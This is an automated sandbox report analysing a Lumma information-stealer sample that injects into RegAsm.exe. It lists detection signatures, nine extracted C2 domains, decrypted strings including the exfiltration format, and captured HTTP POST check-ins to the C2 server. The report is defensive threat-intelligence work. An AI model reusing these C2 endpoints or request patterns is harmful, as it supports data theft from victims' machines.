Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1501451
MD5:c7acff9e420db036ab543e95341b8c8b
SHA1:de57cdf8ddcf91a4dcd617a7e7690dd1127b6a5e
SHA256:dc644e8bfff8121042290307780d3b756f81beae58b452aada89033009883113
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Loader.exe (PID: 6772 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: C7ACFF9E420DB036AB543E95341B8C8B)
    • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 4308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • WerFault.exe (PID: 180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["locatedblsoqp.shop", "traineiwnqo.shop", "evoliutwoqm.shop", "caffegclasiqwp.shop", "stamppreewntnq.shop", "stagedchheiqwo.shop", "froytnewqowv.shop", "condedqpwqm.shop", "millyscroqwp.shop"], "Build id": "yau6Na--503322905"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    Timestamp:2024-08-29T23:43:00.286382+0200
    SID:2055488
    Severity:1
    Source Port:49704
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-29T23:43:01.050251+0200
    SID:2055488
    Severity:1
    Source Port:49705
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-29T23:43:01.536679+0200
    SID:2049812
    Severity:1
    Source Port:49705
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-29T23:43:01.536679+0200
    SID:2054653
    Severity:1
    Source Port:49705
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-29T23:43:00.467801+0200
    SID:2049836
    Severity:1
    Source Port:49704
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-29T23:43:00.467801+0200
    SID:2054653
    Severity:1
    Source Port:49704
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-29T23:42:59.777044+0200
    SID:2055478
    Severity:1
    Source Port:53799
    Destination Port:53
    Protocol:UDP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Loader.exeAvira: detected
    Source: stamppreewntnq.shopAvira URL Cloud: Label: phishing
    Source: froytnewqowv.shopAvira URL Cloud: Label: phishing
    Source: https://froytnewqowv.shop/apiMfAvira URL Cloud: Label: phishing
    Source: https://froytnewqowv.shop/Avira URL Cloud: Label: phishing
    Source: https://froytnewqowv.shop:443/apiAvira URL Cloud: Label: phishing
    Source: https://froytnewqowv.shop/b.yAvira URL Cloud: Label: phishing
    Source: https://froytnewqowv.shop/5Avira URL Cloud: Label: phishing
    Source: https://froytnewqowv.shop/apiAvira URL Cloud: Label: malware
    Source: condedqpwqm.shopAvira URL Cloud: Label: phishing
    Source: locatedblsoqp.shopAvira URL Cloud: Label: phishing
    Source: millyscroqwp.shopAvira URL Cloud: Label: malware
    Source: caffegclasiqwp.shopAvira URL Cloud: Label: malware
    Source: traineiwnqo.shopAvira URL Cloud: Label: malware
    Source: stagedchheiqwo.shopAvira URL Cloud: Label: phishing
    Source: 2.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["locatedblsoqp.shop", "traineiwnqo.shop", "evoliutwoqm.shop", "caffegclasiqwp.shop", "stamppreewntnq.shop", "stagedchheiqwo.shop", "froytnewqowv.shop", "condedqpwqm.shop", "millyscroqwp.shop"], "Build id": "yau6Na--503322905"}
    Source: Loader.exeReversingLabs: Detection: 52%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: caffegclasiqwp.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: stamppreewntnq.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: stagedchheiqwo.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: millyscroqwp.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: evoliutwoqm.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: condedqpwqm.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: traineiwnqo.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: locatedblsoqp.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: froytnewqowv.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: TeslaBrowser/5.5
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: - Screen Resoluton:
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: - Physical Installed Memory:
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Workgroup: -
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: yau6Na--503322905
    Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: Loader.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: c:\wkm1f0mk4\obj\Re\ease\fsB.pdb source: Loader.exe
    Source: Binary string: c:\wkm1f0mk4\obj\Re\ease\fsB.pdb0 source: Loader.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+1Ch]2_2_0040C000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_0040B810
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]2_2_0043BC78
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp]2_2_0040CC80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp]2_2_0040C69D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]2_2_00413846
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000874h]2_2_0041E850
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], cx2_2_0041E850
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], cx2_2_0041F862
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [edx+ebx+3Ch]2_2_0043A830
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]2_2_004390C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_0043E8D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0043E080
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_00413888
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], cx2_2_0041F8B7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0041F8B7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_0041D940
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00431950
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_00415172
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_00415172
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-24h]2_2_00415172
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [ebx]2_2_0043F9E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h2_2_004211B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h2_2_00413A50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000D8h]2_2_0042A2DC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+34h]2_2_0042A2DC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+34h]2_2_0042A2DC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+18h]2_2_0042A2DC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh2_2_0042A2DC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_004122E6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_0043F290
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al2_2_00427B30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00423BE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], ax2_2_0041DBEA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0043E390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0043D470
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0043DC70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_0041C400
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]2_2_0041E411
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_004104D1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+38h]2_2_0040F578
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx2_2_0041CDED
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ebx+01h], 00000000h2_2_0041CDED
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00424640
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041C660
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_00415E62
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000D8h]2_2_0042866E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]2_2_00403E70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000874h]2_2_0041E6C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], cx2_2_0041E6C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00423F07
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0043DF90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx2_2_0043A796

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2055478 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (froytnewqowv .shop) : 192.168.2.5:53799 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2055488 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop) : 192.168.2.5:49704 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2055488 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop) : 192.168.2.5:49705 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.97.3:443
    Source: Malware configuration extractorURLs: locatedblsoqp.shop
    Source: Malware configuration extractorURLs: traineiwnqo.shop
    Source: Malware configuration extractorURLs: evoliutwoqm.shop
    Source: Malware configuration extractorURLs: caffegclasiqwp.shop
    Source: Malware configuration extractorURLs: stamppreewntnq.shop
    Source: Malware configuration extractorURLs: stagedchheiqwo.shop
    Source: Malware configuration extractorURLs: froytnewqowv.shop
    Source: Malware configuration extractorURLs: condedqpwqm.shop
    Source: Malware configuration extractorURLs: millyscroqwp.shop
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: froytnewqowv.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=WPsWM85KukmjMUsre4jDC_vkIYPgT8CkFWdcUGh8ipk-1724967780-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: froytnewqowv.shop
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: froytnewqowv.shop
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: froytnewqowv.shop
    Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
    Source: RegAsm.exe, 00000002.00000002.2208570206.0000000001042000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2208570206.000000000104F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://froytnewqowv.shop/
    Source: RegAsm.exe, 00000002.00000002.2208570206.000000000104F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://froytnewqowv.shop/5
    Source: RegAsm.exe, 00000002.00000002.2208570206.000000000102F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2208570206.000000000100A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://froytnewqowv.shop/api
    Source: RegAsm.exe, 00000002.00000002.2208570206.000000000102F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://froytnewqowv.shop/apiMf
    Source: RegAsm.exe, 00000002.00000002.2208570206.000000000100A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://froytnewqowv.shop/b.y
    Source: RegAsm.exe, 00000002.00000002.2208570206.0000000001066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://froytnewqowv.shop:443/api
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00431530
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00431530
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00425380 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00425380

    System Summary

    barindex
    Source: Loader.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 308224
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_01530B200_2_01530B20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043681D2_2_0043681D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040CC802_2_0040CC80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C69D2_2_0040C69D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E8502_2_0041E850
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043B0502_2_0043B050
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042D0562_2_0042D056
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042285E2_2_0042285E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004088702_2_00408870
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004098102_2_00409810
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004300352_2_00430035
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042E8D72_2_0042E8D7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043E0802_2_0043E080
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004020AD2_2_004020AD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041F8B72_2_0041F8B7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004361502_2_00436150
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004209702_2_00420970
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004151722_2_00415172
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043F9E02_2_0043F9E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042D9EB2_2_0042D9EB
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004081902_2_00408190
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043D9AD2_2_0043D9AD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004211B02_2_004211B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042C9B72_2_0042C9B7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00405A402_2_00405A40
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00429A492_2_00429A49
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004262062_2_00426206
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042BADA2_2_0042BADA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042A2DC2_2_0042A2DC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004122E62_2_004122E6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042E2AC2_2_0042E2AC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004203602_2_00420360
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411B6E2_2_00411B6E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00424B702_2_00424B70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004013302_2_00401330
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00427B302_2_00427B30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004323DD2_2_004323DD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004063E02_2_004063E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00407B802_2_00407B80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040DB902_2_0040DB90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043E3902_2_0043E390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00425B9D2_2_00425B9D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004223B52_2_004223B5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043DC702_2_0043DC70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00404C202_2_00404C20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042F4C72_2_0042F4C7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D4D02_2_0040D4D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00435CD02_2_00435CD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041A4EA2_2_0041A4EA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00433D5E2_2_00433D5E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F5782_2_0040F578
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A5002_2_0040A500
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042C5212_2_0042C521
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00420D302_2_00420D30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004315302_2_00431530
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004285352_2_00428535
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043D5DE2_2_0043D5DE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CDED2_2_0041CDED
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00421DB52_2_00421DB5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042AE2B2_2_0042AE2B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E6C02_2_0041E6C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043F6F02_2_0043F6F0
